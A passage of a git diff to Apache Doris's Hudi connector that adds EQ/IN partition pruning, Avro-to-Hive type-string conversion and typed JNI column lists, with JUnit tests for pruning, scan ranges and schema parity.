pruned={}", + hudiHandle.getDbName(), hudiHandle.getTableName(), + allPartNames.size(), matchedPartNames.size()); + + // Build updated handle carrying only the matched partition paths for scan planning. HudiTableHandle updatedHandle = hudiHandle.toBuilder() - .prunedPartitionPaths(partitionNames) + .prunedPartitionPaths(matchedPartNames) .build(); return Optional.of(new FilterApplicationResult<>(updatedHandle, constraint.getExpression(), false)); @@ -230,8 +259,11 @@ private List getSchemaFromHms(String dbName, String tableName) /** * Convert Avro schema fields to ConnectorColumn list. + * + *

Package-private and static so it can be unit-tested directly with a + * hand-built Avro schema (no live HoodieTableMetaClient needed).

*/ - private List avroSchemaToColumns(Schema avroSchema) { + static List avroSchemaToColumns(Schema avroSchema) { List fields = avroSchema.getFields(); List columns = new ArrayList<>(fields.size()); for (Schema.Field field : fields) { @@ -239,7 +271,12 @@ private List avroSchemaToColumns(Schema avroSchema) { Schema fieldSchema = unwrapNullable(field.schema()); ConnectorType connectorType = HudiTypeMapping.fromAvroSchema(fieldSchema); String comment = field.doc() != null ? field.doc() : ""; - columns.add(new ConnectorColumn(field.name(), connectorType, comment, nullable, null)); + // Lower-case the top-level column name to mirror legacy + // HMSExternalTable.initHudiSchema (name().toLowerCase(Locale.ROOT)). + // Nested struct field names are left as-is here and in HudiTypeMapping, + // matching legacy (which lowercases only the top-level column name). + String columnName = field.name().toLowerCase(Locale.ROOT); + columns.add(new ConnectorColumn(columnName, connectorType, comment, nullable, null)); } return columns; } @@ -303,4 +340,113 @@ private Configuration buildHadoopConf() { } return conf; } + + // ========== Partition pruning helpers ========== + // Mirrors HiveConnectorMetadata's EQ/IN partition pruning. Duplicated rather than + // shared because fe-connector-hudi depends on fe-connector-hms, not fe-connector-hive; + // consolidate during the Hive (P7) migration. See P3-T05 design. + + /** + * Extracts equality predicates on partition columns from the expression tree. + * Supports: col = 'value', col IN ('v1', 'v2', ...), AND combinations. + */ + private Map> extractPartitionPredicates( + ConnectorExpression expr, List partKeyNames) { + Set partKeySet = partKeyNames.stream().collect(Collectors.toSet()); + Map> result = new HashMap<>(); + extractPredicatesRecursive(expr, partKeySet, result); + return result; + } + + private void extractPredicatesRecursive(ConnectorExpression expr, + Set partKeySet, Map> result) { + if (expr instanceof ConnectorAnd) { + for (ConnectorExpression child : ((ConnectorAnd) expr).getConjuncts()) { + extractPredicatesRecursive(child, partKeySet, result); + } + } else if (expr instanceof ConnectorComparison) { + ConnectorComparison cmp = (ConnectorComparison) expr; + if (cmp.getOperator() == ConnectorComparison.Operator.EQ) { + String colName = extractColumnName(cmp.getLeft()); + String value = extractLiteralValue(cmp.getRight()); + if (colName != null && value != null && partKeySet.contains(colName)) { + result.computeIfAbsent(colName, k -> new ArrayList<>()).add(value); + } + } + } else if (expr instanceof ConnectorIn) { + ConnectorIn inExpr = (ConnectorIn) expr; + if (!inExpr.isNegated()) { + String colName = extractColumnName(inExpr.getValue()); + if (colName != null && partKeySet.contains(colName)) { + List values = new ArrayList<>(); + for (ConnectorExpression item : inExpr.getInList()) { + String val = extractLiteralValue(item); + if (val != null) { + values.add(val); + } + } + if (!values.isEmpty()) { + result.computeIfAbsent(colName, k -> new ArrayList<>()).addAll(values); + } + } + } + } + } + + private String extractColumnName(ConnectorExpression expr) { + if (expr instanceof org.apache.doris.connector.api.pushdown.ConnectorColumnRef) { + return ((org.apache.doris.connector.api.pushdown.ConnectorColumnRef) expr).getColumnName(); + } + return null; + } + + private String extractLiteralValue(ConnectorExpression expr) { + if (expr instanceof ConnectorLiteral) { + Object val = ((ConnectorLiteral) expr).getValue(); + return val != null ? String.valueOf(val) : null; + } + return null; + } + + /** + * Prunes partition names based on extracted equality predicates. + * Partition names follow the Hive convention: key1=val1/key2=val2 + */ + private List prunePartitionNames(List allPartNames, + List partKeyNames, Map> predicates) { + List matched = new ArrayList<>(); + for (String partName : allPartNames) { + Map partValues = parsePartitionName(partName, partKeyNames); + if (matchesPredicates(partValues, predicates)) { + matched.add(partName); + } + } + return matched; + } + + private Map parsePartitionName(String partName, + List partKeyNames) { + Map values = new HashMap<>(); + String[] parts = partName.split("/"); + for (String part : parts) { + int eq = part.indexOf('='); + if (eq > 0) { + values.put(part.substring(0, eq), part.substring(eq + 1)); + } + } + return values; + } + + private boolean matchesPredicates(Map partValues, + Map> predicates) { + for (Map.Entry> entry : predicates.entrySet()) { + String colName = entry.getKey(); + List allowedValues = entry.getValue(); + String actualValue = partValues.get(colName); + if (actualValue == null || !allowedValues.contains(actualValue)) { + return false; + } + } + return true; + } } diff --git a/fe/fe-connector/fe-connector-hudi/src/main/java/org/apache/doris/connector/hudi/HudiScanPlanProvider.java b/fe/fe-connector/fe-connector-hudi/src/main/java/org/apache/doris/connector/hudi/HudiScanPlanProvider.java index d5f6b3628ddc66..9df29b5166889a 100644 --- a/fe/fe-connector/fe-connector-hudi/src/main/java/org/apache/doris/connector/hudi/HudiScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-hudi/src/main/java/org/apache/doris/connector/hudi/HudiScanPlanProvider.java @@ -116,7 +116,7 @@ public List planScan( columnNames = avroSchema.getFields().stream() .map(Schema.Field::name).collect(Collectors.toList()); columnTypes = avroSchema.getFields().stream() - .map(f -> HudiTypeMapping.fromAvroSchema(unwrapNullable(f.schema())).getTypeName()) + .map(f -> HudiTypeMapping.toHiveTypeString(f.schema())) .collect(Collectors.toList()); } catch (Exception e) { LOG.warn("Failed to resolve Hudi schema for JNI reader, JNI splits may fail: {}", @@ -347,17 +347,6 @@ private static String detectFileFormat(String filePath) { return "parquet"; } - private static Schema unwrapNullable(Schema schema) { - if (schema.getType() == Schema.Type.UNION) { - for (Schema s : schema.getTypes()) { - if (s.getType() != Schema.Type.NULL) { - return s; - } - } - } - return schema; - } - private Configuration buildHadoopConf() { Configuration conf = new Configuration(); for (Map.Entry entry : properties.entrySet()) { diff --git a/fe/fe-connector/fe-connector-hudi/src/main/java/org/apache/doris/connector/hudi/HudiScanRange.java b/fe/fe-connector/fe-connector-hudi/src/main/java/org/apache/doris/connector/hudi/HudiScanRange.java index 3e2526a261adc4..7566f9ae1b9084 100644 --- a/fe/fe-connector/fe-connector-hudi/src/main/java/org/apache/doris/connector/hudi/HudiScanRange.java +++ b/fe/fe-connector/fe-connector-hudi/src/main/java/org/apache/doris/connector/hudi/HudiScanRange.java @@ -26,7 +26,6 @@ import org.apache.doris.thrift.TTableFormatFileDesc; import java.util.ArrayList; -import java.util.Arrays; import java.util.Collections; import java.util.HashMap; import java.util.List; @@ -56,6 +55,15 @@ public class HudiScanRange implements ConnectorScanRange { private final String fileFormat; private final Map partitionValues; private final Map properties; + // JNI reader list fields. Kept as typed lists (NOT joined into the + // properties map) because Hive type strings contain commas + // (e.g. decimal(10,2), struct): a comma join+split + // round-trip would shatter them and misalign column_names/column_types. + // BE (hudi_jni_reader.cpp) joins these lists itself with the correct + // delimiters (names ',', types '#', delta logs ','). + private final List deltaLogs; + private final List columnNames; + private final List columnTypes; private HudiScanRange(Builder builder) { this.path = builder.path; @@ -85,16 +93,17 @@ private HudiScanRange(Builder builder) { props.put("hudi.data_file_path", builder.dataFilePath); } props.put("hudi.data_file_length", String.valueOf(builder.dataFileLength)); - if (builder.deltaLogs != null && !builder.deltaLogs.isEmpty()) { - props.put("hudi.delta_logs", String.join(",", builder.deltaLogs)); - } - if (builder.columnNames != null && !builder.columnNames.isEmpty()) { - props.put("hudi.column_names", String.join(",", builder.columnNames)); - } - if (builder.columnTypes != null && !builder.columnTypes.isEmpty()) { - props.put("hudi.column_types", String.join(",", builder.columnTypes)); - } this.properties = Collections.unmodifiableMap(props); + + this.deltaLogs = builder.deltaLogs != null + ? Collections.unmodifiableList(new ArrayList<>(builder.deltaLogs)) + : Collections.emptyList(); + this.columnNames = builder.columnNames != null + ? Collections.unmodifiableList(new ArrayList<>(builder.columnNames)) + : Collections.emptyList(); + this.columnTypes = builder.columnTypes != null + ? Collections.unmodifiableList(new ArrayList<>(builder.columnTypes)) + : Collections.emptyList(); } @Override @@ -158,8 +167,7 @@ public void populateRangeParams(TTableFormatFileDesc formatDesc, // Dynamic format downgrade: if JNI but no delta logs, use native reader if (isJni) { - String deltaLogs = props.get("hudi.delta_logs"); - if (deltaLogs == null || deltaLogs.isEmpty()) { + if (deltaLogs.isEmpty()) { String dataFilePath = props.getOrDefault( "hudi.data_file_path", ""); if (!dataFilePath.isEmpty()) { @@ -188,20 +196,18 @@ public void populateRangeParams(TTableFormatFileDesc formatDesc, fileDesc.setDataFileLength(Long.parseLong( props.getOrDefault("hudi.data_file_length", "0"))); - String deltaLogs = props.get("hudi.delta_logs"); - if (deltaLogs != null && !deltaLogs.isEmpty()) { - fileDesc.setDeltaLogs( - Arrays.asList(deltaLogs.split(","))); + // Set typed lists directly. BE (hudi_jni_reader.cpp) joins them with + // the correct delimiters: column_names ',', column_types '#', delta + // logs ','. Joining/splitting here would shatter comma-bearing Hive + // type strings (decimal(10,2), struct<...>). + if (!deltaLogs.isEmpty()) { + fileDesc.setDeltaLogs(deltaLogs); } - String colNames = props.get("hudi.column_names"); - if (colNames != null && !colNames.isEmpty()) { - fileDesc.setColumnNames( - Arrays.asList(colNames.split(","))); + if (!columnNames.isEmpty()) { + fileDesc.setColumnNames(columnNames); } - String colTypes = props.get("hudi.column_types"); - if (colTypes != null && !colTypes.isEmpty()) { - fileDesc.setColumnTypes( - Arrays.asList(colTypes.split(","))); + if (!columnTypes.isEmpty()) { + fileDesc.setColumnTypes(columnTypes); } } diff --git a/fe/fe-connector/fe-connector-hudi/src/main/java/org/apache/doris/connector/hudi/HudiTypeMapping.java b/fe/fe-connector/fe-connector-hudi/src/main/java/org/apache/doris/connector/hudi/HudiTypeMapping.java index 3e3d10bff7ad8c..3581bc2d1893c2 100644 --- a/fe/fe-connector/fe-connector-hudi/src/main/java/org/apache/doris/connector/hudi/HudiTypeMapping.java +++ b/fe/fe-connector/fe-connector-hudi/src/main/java/org/apache/doris/connector/hudi/HudiTypeMapping.java @@ -78,6 +78,99 @@ public static ConnectorType fromAvroSchema(Schema avroSchema) { } } + /** + * Convert an Avro schema to a Hive type string, mirroring fe-core + * {@code HudiUtils.convertAvroToHiveType}. + * + *

This feeds the BE Hudi JNI scanner's {@code hudi_column_types} param. + * The BE joins the per-column type list with {@code '#'} and the scanner + * ({@code HadoopHudiJniScanner}) splits it back on {@code '#'} — so each + * returned string is a single list element and may safely contain commas + * (e.g. {@code decimal(10,2)}, {@code struct}, + * {@code map}).

+ * + *

This is distinct from {@link #fromAvroSchema}, which maps Avro to a + * Doris {@link ConnectorType} for schema reporting. The JNI reader needs + * Hive type strings, not Doris type names.

+ * + * @throws IllegalArgumentException for unsupported types (matches the + * legacy fail-loud behavior) + */ + public static String toHiveTypeString(Schema schema) { + Schema.Type type = schema.getType(); + LogicalType logicalType = schema.getLogicalType(); + + switch (type) { + case BOOLEAN: + return "boolean"; + case INT: + if (logicalType instanceof LogicalTypes.Date) { + return "date"; + } + if (logicalType instanceof LogicalTypes.TimeMillis) { + throw unsupportedLogicalType(schema); + } + return "int"; + case LONG: + if (logicalType instanceof LogicalTypes.TimestampMillis + || logicalType instanceof LogicalTypes.TimestampMicros) { + return "timestamp"; + } + if (logicalType instanceof LogicalTypes.TimeMicros) { + throw unsupportedLogicalType(schema); + } + return "bigint"; + case FLOAT: + return "float"; + case DOUBLE: + return "double"; + case STRING: + return "string"; + case FIXED: + case BYTES: + if (logicalType instanceof LogicalTypes.Decimal) { + LogicalTypes.Decimal decimalType = (LogicalTypes.Decimal) logicalType; + return String.format("decimal(%d,%d)", + decimalType.getPrecision(), decimalType.getScale()); + } + return "string"; + case ARRAY: + return String.format("array<%s>", + toHiveTypeString(schema.getElementType())); + case RECORD: + List recordFields = schema.getFields(); + if (recordFields.isEmpty()) { + throw new IllegalArgumentException("Record must have fields"); + } + String structFields = recordFields.stream() + .map(field -> String.format("%s:%s", field.name(), + toHiveTypeString(field.schema()))) + .collect(Collectors.joining(",")); + return String.format("struct<%s>", structFields); + case MAP: + return String.format("map", + toHiveTypeString(schema.getValueType())); + case UNION: + List unionTypes = schema.getTypes().stream() + .filter(s -> s.getType() != Schema.Type.NULL) + .collect(Collectors.toList()); + if (unionTypes.size() == 1) { + return toHiveTypeString(unionTypes.get(0)); + } + break; + default: + break; + } + + throw new IllegalArgumentException(String.format( + "Unsupported type: %s for column: %s", type.getName(), schema.getName())); + } + + private static IllegalArgumentException unsupportedLogicalType(Schema schema) { + return new IllegalArgumentException( + String.format("Unsupported logical type: %s", schema.getLogicalType())); + } + private static ConnectorType mapIntType(LogicalType logicalType) { if (logicalType instanceof LogicalTypes.Date) { return ConnectorType.of("DATEV2"); diff --git a/fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiPartitionPruningTest.java b/fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiPartitionPruningTest.java new file mode 100644 index 00000000000000..af6b59a532be0b --- /dev/null +++ b/fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiPartitionPruningTest.java @@ -0,0 +1,265 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.hudi; + +import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.pushdown.ConnectorAnd; +import org.apache.doris.connector.api.pushdown.ConnectorColumnRef; +import org.apache.doris.connector.api.pushdown.ConnectorComparison; +import org.apache.doris.connector.api.pushdown.ConnectorExpression; +import org.apache.doris.connector.api.pushdown.ConnectorFilterConstraint; +import org.apache.doris.connector.api.pushdown.ConnectorIn; +import org.apache.doris.connector.api.pushdown.ConnectorLiteral; +import org.apache.doris.connector.api.pushdown.FilterApplicationResult; +import org.apache.doris.connector.hms.HmsClient; +import org.apache.doris.connector.hms.HmsDatabaseInfo; +import org.apache.doris.connector.hms.HmsPartitionInfo; +import org.apache.doris.connector.hms.HmsTableInfo; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.ArrayList; +import java.util.Arrays; +import java.util.Collections; +import java.util.List; +import java.util.Map; +import java.util.Optional; + +/** + * Tests {@link HudiConnectorMetadata#applyFilter} partition pruning (P3-T05). + * + *

WHY: the SPI Hudi path previously listed ALL partitions unconditionally and + * stored them as {@code prunedPartitionPaths}, doing no EQ/IN pruning at all and + * silently forcing the partition source to HMS for any filtered query. These tests + * pin the corrected behavior, mirroring {@code HiveConnectorMetadata}: + *

    + *
  • EQ / IN predicates on partition columns reduce the scanned partition set;
  • + *
  • predicates on non-partition columns (or range predicates) never prune;
  • + *
  • when no partition predicate applies, the handle is left untouched + * ({@code Optional.empty()}) so scan planning falls back to Hudi's own listing;
  • + *
  • a predicate that matches every / no partition is handled correctly.
  • + *
+ * A test that passed against the old stub (which always returned all partitions) + * would be wrong — each assertion checks the precise pruned set.

+ */ +public class HudiPartitionPruningTest { + + private static final List PARTITIONS = Arrays.asList( + "year=2023/month=12", + "year=2024/month=01", + "year=2024/month=02"); + + private static final List PART_KEYS = Arrays.asList("year", "month"); + + @Test + public void testEqOnPartitionColumnPrunes() { + // year = '2024' -> only the two 2024 partitions + Optional> result = + applyFilter(partitionedHandle(), eq("year", "2024")); + + Assertions.assertTrue(result.isPresent()); + Assertions.assertEquals( + Arrays.asList("year=2024/month=01", "year=2024/month=02"), + prunedPaths(result)); + } + + @Test + public void testInOnPartitionColumnPrunes() { + // month IN ('01', '12') -> spans years, keeps original order + Optional> result = + applyFilter(partitionedHandle(), in("month", "01", "12")); + + Assertions.assertTrue(result.isPresent()); + Assertions.assertEquals( + Arrays.asList("year=2023/month=12", "year=2024/month=01"), + prunedPaths(result)); + } + + @Test + public void testAndOfTwoPartitionColumnsPrunes() { + // year = '2024' AND month = '01' -> a single partition + ConnectorExpression expr = and(eq("year", "2024"), eq("month", "01")); + Optional> result = + applyFilter(partitionedHandle(), expr); + + Assertions.assertTrue(result.isPresent()); + Assertions.assertEquals( + Collections.singletonList("year=2024/month=01"), + prunedPaths(result)); + } + + @Test + public void testNonPartitionColumnInAndIsIgnored() { + // year = '2024' AND price = '100' -> prune on year only; non-partition pred ignored + ConnectorExpression expr = and(eq("year", "2024"), eq("price", "100")); + Optional> result = + applyFilter(partitionedHandle(), expr); + + Assertions.assertTrue(result.isPresent()); + Assertions.assertEquals( + Arrays.asList("year=2024/month=01", "year=2024/month=02"), + prunedPaths(result)); + } + + @Test + public void testNonPartitionPredicateOnlyLeavesHandleUntouched() { + // price = '100' -> no partition predicate -> Optional.empty() (no source switch) + Optional> result = + applyFilter(partitionedHandle(), eq("price", "100")); + + Assertions.assertFalse(result.isPresent()); + } + + @Test + public void testPredicateMatchingAllPartitionsHasNoEffect() { + // year IN ('2023', '2024') -> matches every partition -> Optional.empty() + Optional> result = + applyFilter(partitionedHandle(), in("year", "2023", "2024")); + + Assertions.assertFalse(result.isPresent()); + } + + @Test + public void testPredicateMatchingNoPartitionYieldsEmptyPrunedList() { + // year = '1999' -> matches nothing -> present handle with empty pruned set (scan 0) + Optional> result = + applyFilter(partitionedHandle(), eq("year", "1999")); + + Assertions.assertTrue(result.isPresent()); + Assertions.assertTrue(prunedPaths(result).isEmpty()); + } + + @Test + public void testUnpartitionedTableIsNotTouched() { + HudiTableHandle handle = new HudiTableHandle.Builder("db", "t", "s3://b/t", "COPY_ON_WRITE") + .partitionKeyNames(Collections.emptyList()) + .build(); + Optional> result = + applyFilter(handle, eq("year", "2024")); + + Assertions.assertFalse(result.isPresent()); + } + + // ========== helpers ========== + + private Optional> applyFilter( + HudiTableHandle handle, ConnectorExpression expr) { + HudiConnectorMetadata metadata = new HudiConnectorMetadata( + new FakeHmsClient(PARTITIONS), Collections.emptyMap()); + return metadata.applyFilter(null, handle, new ConnectorFilterConstraint(expr)); + } + + private HudiTableHandle partitionedHandle() { + return new HudiTableHandle.Builder("db", "t", "s3://b/t", "COPY_ON_WRITE") + .partitionKeyNames(PART_KEYS) + .build(); + } + + @SuppressWarnings("unchecked") + private List prunedPaths(Optional> result) { + return ((HudiTableHandle) result.get().getHandle()).getPrunedPartitionPaths(); + } + + private static ConnectorColumnRef colRef(String name) { + return new ConnectorColumnRef(name, ConnectorType.of("STRING")); + } + + private static ConnectorLiteral lit(String value) { + return new ConnectorLiteral(ConnectorType.of("STRING"), value); + } + + private static ConnectorComparison eq(String col, String value) { + return new ConnectorComparison(ConnectorComparison.Operator.EQ, colRef(col), lit(value)); + } + + private static ConnectorIn in(String col, String... values) { + List inList = new ArrayList<>(); + for (String v : values) { + inList.add(lit(v)); + } + return new ConnectorIn(colRef(col), inList, false); + } + + private static ConnectorAnd and(ConnectorExpression... children) { + return new ConnectorAnd(Arrays.asList(children)); + } + + /** + * Minimal {@link HmsClient} double returning a fixed partition-name list. + * Only {@code listPartitionNames} is exercised by partition pruning; the rest fail loud. + */ + private static final class FakeHmsClient implements HmsClient { + private final List partitionNames; + + FakeHmsClient(List partitionNames) { + this.partitionNames = partitionNames; + } + + @Override + public List listPartitionNames(String dbName, String tableName, int maxParts) { + return partitionNames; + } + + @Override + public List listDatabases() { + throw new UnsupportedOperationException(); + } + + @Override + public HmsDatabaseInfo getDatabase(String dbName) { + throw new UnsupportedOperationException(); + } + + @Override + public List listTables(String dbName) { + throw new UnsupportedOperationException(); + } + + @Override + public boolean tableExists(String dbName, String tableName) { + throw new UnsupportedOperationException(); + } + + @Override + public HmsTableInfo getTable(String dbName, String tableName) { + throw new UnsupportedOperationException(); + } + + @Override + public Map getDefaultColumnValues(String dbName, String tableName) { + throw new UnsupportedOperationException(); + } + + @Override + public List getPartitions(String dbName, String tableName, + List partNames) { + throw new UnsupportedOperationException(); + } + + @Override + public HmsPartitionInfo getPartition(String dbName, String tableName, List values) { + throw new UnsupportedOperationException(); + } + + @Override + public void close() { + } + } +} diff --git a/fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiScanRangeTest.java b/fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiScanRangeTest.java new file mode 100644 index 00000000000000..7f8aeeebee8d0e --- /dev/null +++ b/fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiScanRangeTest.java @@ -0,0 +1,95 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.hudi; + +import org.apache.doris.thrift.TFileFormatType; +import org.apache.doris.thrift.TFileRangeDesc; +import org.apache.doris.thrift.THudiFileDesc; +import org.apache.doris.thrift.TTableFormatFileDesc; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Arrays; + +/** + * Tests {@link HudiScanRange#populateRangeParams}. + * + *

WHY: column_names/column_types/delta_logs are thrift {@code list}; + * BE ({@code hudi_jni_reader.cpp}) joins them with distinct delimiters + * (names ',', types '#', delta logs ','). The FE must pass each per-column type + * as a single list element. The previous code joined them with ',' and split + * back by ',', which shattered comma-bearing Hive type strings + * ({@code decimal(10,2)}, {@code struct<...>}) and misaligned names/types. + * These tests pin that the typed lists survive intact and aligned.

+ */ +public class HudiScanRangeTest { + + @Test + public void testJniListsSurviveIntactAndAligned() { + HudiScanRange range = new HudiScanRange.Builder() + .path("s3://bucket/t/file") + .fileFormat("jni") + .instantTime("20240101000000000") + .serde("org.apache.hadoop.hive.ql.io.parquet.serde.ParquetHiveSerDe") + .inputFormat("org.apache.hudi.hadoop.realtime.HoodieParquetRealtimeInputFormat") + .basePath("s3://bucket/t") + .dataFilePath("s3://bucket/t/base.parquet") + .dataFileLength(123L) + .deltaLogs(Arrays.asList("s3://bucket/t/.f.log.1_0", "s3://bucket/t/.f.log.2_0")) + .columnNames(Arrays.asList("x", "y", "z")) + .columnTypes(Arrays.asList("int", "decimal(10,2)", "struct")) + .build(); + + TTableFormatFileDesc formatDesc = new TTableFormatFileDesc(); + TFileRangeDesc rangeDesc = new TFileRangeDesc(); + range.populateRangeParams(formatDesc, rangeDesc); + + THudiFileDesc fileDesc = formatDesc.getHudiParams(); + + // Types must NOT be shattered: 3 columns -> 3 type strings (old bug + // produced 5: "decimal(10","2)","struct"). + Assertions.assertEquals(Arrays.asList("int", "decimal(10,2)", "struct"), + fileDesc.getColumnTypes()); + Assertions.assertEquals(Arrays.asList("x", "y", "z"), fileDesc.getColumnNames()); + Assertions.assertEquals(Arrays.asList("s3://bucket/t/.f.log.1_0", "s3://bucket/t/.f.log.2_0"), + fileDesc.getDeltaLogs()); + + // names <-> types alignment (the JNI scanner zips them positionally). + Assertions.assertEquals(fileDesc.getColumnNames().size(), fileDesc.getColumnTypes().size()); + } + + @Test + public void testNoDeltaLogsDowngradesToNativeParquet() { + // MOR file slice with no delta logs -> native parquet reader; no JNI lists set. + HudiScanRange range = new HudiScanRange.Builder() + .path("s3://bucket/t/base.parquet") + .fileFormat("jni") + .dataFilePath("s3://bucket/t/base.parquet") + .dataFileLength(456L) + .build(); + + TTableFormatFileDesc formatDesc = new TTableFormatFileDesc(); + TFileRangeDesc rangeDesc = new TFileRangeDesc(); + range.populateRangeParams(formatDesc, rangeDesc); + + Assertions.assertEquals(TFileFormatType.FORMAT_PARQUET, rangeDesc.getFormatType()); + Assertions.assertFalse(formatDesc.getHudiParams().isSetColumnTypes()); + Assertions.assertFalse(formatDesc.getHudiParams().isSetColumnNames()); + } +} diff --git a/fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiSchemaParityTest.java b/fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiSchemaParityTest.java new file mode 100644 index 00000000000000..9ae752484e5efc --- /dev/null +++ b/fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiSchemaParityTest.java @@ -0,0 +1,135 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.hudi; + +import org.apache.doris.connector.api.ConnectorColumn; +import org.apache.doris.connector.api.ConnectorType; + +import org.apache.avro.Schema; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Arrays; +import java.util.List; + +/** + * Schema-level parity for the SPI Hudi metadata path (P3-T07, batch C). + * + *

WHY: {@code getTableSchema} derives its column list from the Hudi Avro schema + * via {@link HudiConnectorMetadata#avroSchemaToColumns}. This must produce the same + * column set — names, order, Doris types, nullability — and the same per-column + * Hive type strings ({@code colTypes}) as legacy fe-core + * {@code HMSExternalTable.initHudiSchema} (:740-753) + + * {@code HudiUtils.fromAvroHudiTypeToDorisType} / {@code convertAvroToHiveType}. + * Because no compile path sees both modules (fe-core does not depend on the concrete + * connector modules), parity is asserted against golden values transcribed from — + * and annotated with — the legacy contract.

+ * + *

COW vs MOR: schema derivation is table-type-agnostic on BOTH sides (neither + * consults COW/MOR), so a single golden schema covers both; the COW/MOR distinction + * lives only in scan planning and is pinned separately by {@link HudiTableTypeTest}.

+ * + *

Two assertions deliberately encode the P3-T07 column-name-casing fix: the + * top-level column name is lower-cased (legacy {@code toLowerCase(Locale.ROOT)} at + * {@code HMSExternalTable.java:745}), while a NESTED struct field name keeps its + * original case (legacy lowercases only the top-level column). A test that passed + * with the old raw-case behavior would be wrong.

+ */ +public class HudiSchemaParityTest { + + // A representative Hudi table schema in Avro JSON (the form Hudi actually stores). + // Mixed-case top-level names (Id, Name, Addr) and a mixed-case nested field + // (Street) exercise the casing boundary; the type variety mirrors the legacy + // type matrix (primitive, decimal, date, timestamp, nullable, array, map, struct). + private static final String SCHEMA_JSON = + "{\"type\":\"record\",\"name\":\"hudi_t\",\"fields\":[" + + "{\"name\":\"Id\",\"type\":\"long\"}," + + "{\"name\":\"Name\",\"type\":[\"null\",\"string\"],\"default\":null}," + + "{\"name\":\"price\",\"type\":{\"type\":\"bytes\",\"logicalType\":\"decimal\"," + + "\"precision\":10,\"scale\":2}}," + + "{\"name\":\"event_date\",\"type\":{\"type\":\"int\",\"logicalType\":\"date\"}}," + + "{\"name\":\"created_at\",\"type\":{\"type\":\"long\",\"logicalType\":\"timestamp-micros\"}}," + + "{\"name\":\"tags\",\"type\":{\"type\":\"array\",\"items\":\"string\"}}," + + "{\"name\":\"props\",\"type\":{\"type\":\"map\",\"values\":\"int\"}}," + + "{\"name\":\"Addr\",\"type\":{\"type\":\"record\",\"name\":\"AddrRec\",\"fields\":[" + + "{\"name\":\"Street\",\"type\":\"string\"},{\"name\":\"zip\",\"type\":\"int\"}]}}" + + "]}"; + + // Golden column contract, mirroring legacy initHudiSchema field-by-field. + private static final List EXPECTED_NAMES = Arrays.asList( + "id", "name", "price", "event_date", "created_at", "tags", "props", "addr"); + + private static final List EXPECTED_TYPES = Arrays.asList( + ConnectorType.of("BIGINT"), + ConnectorType.of("STRING"), + ConnectorType.of("DECIMALV3", 10, 2), + ConnectorType.of("DATEV2"), + ConnectorType.of("DATETIMEV2", 6, 0), + ConnectorType.arrayOf(ConnectorType.of("STRING")), + ConnectorType.mapOf(ConnectorType.of("STRING"), ConnectorType.of("INT")), + ConnectorType.structOf(Arrays.asList("Street", "zip"), + Arrays.asList(ConnectorType.of("STRING"), ConnectorType.of("INT")))); + + // Only the union-typed "Name" field is nullable; the flag must track the union, + // not be a constant. + private static final List EXPECTED_NULLABLE = Arrays.asList( + false, true, false, false, false, false, false, false); + + // Hive type strings = legacy colTypes (convertAvroToHiveType per field). + private static final List EXPECTED_HIVE_TYPES = Arrays.asList( + "bigint", "string", "decimal(10,2)", "date", "timestamp", + "array", "map", "struct"); + + private static Schema schema() { + return new Schema.Parser().parse(SCHEMA_JSON); + } + + @Test + public void testSchemaColumnsMirrorLegacyContract() { + List columns = HudiConnectorMetadata.avroSchemaToColumns(schema()); + Assertions.assertEquals(EXPECTED_NAMES.size(), columns.size()); + for (int i = 0; i < columns.size(); i++) { + ConnectorColumn col = columns.get(i); + Assertions.assertEquals(EXPECTED_NAMES.get(i), col.getName(), "name[" + i + "]"); + Assertions.assertEquals(EXPECTED_TYPES.get(i), col.getType(), "type[" + i + "]"); + Assertions.assertEquals(EXPECTED_NULLABLE.get(i), col.isNullable(), "nullable[" + i + "]"); + } + } + + @Test + public void testColumnTypeStringsMirrorLegacyColTypes() { + List fields = schema().getFields(); + 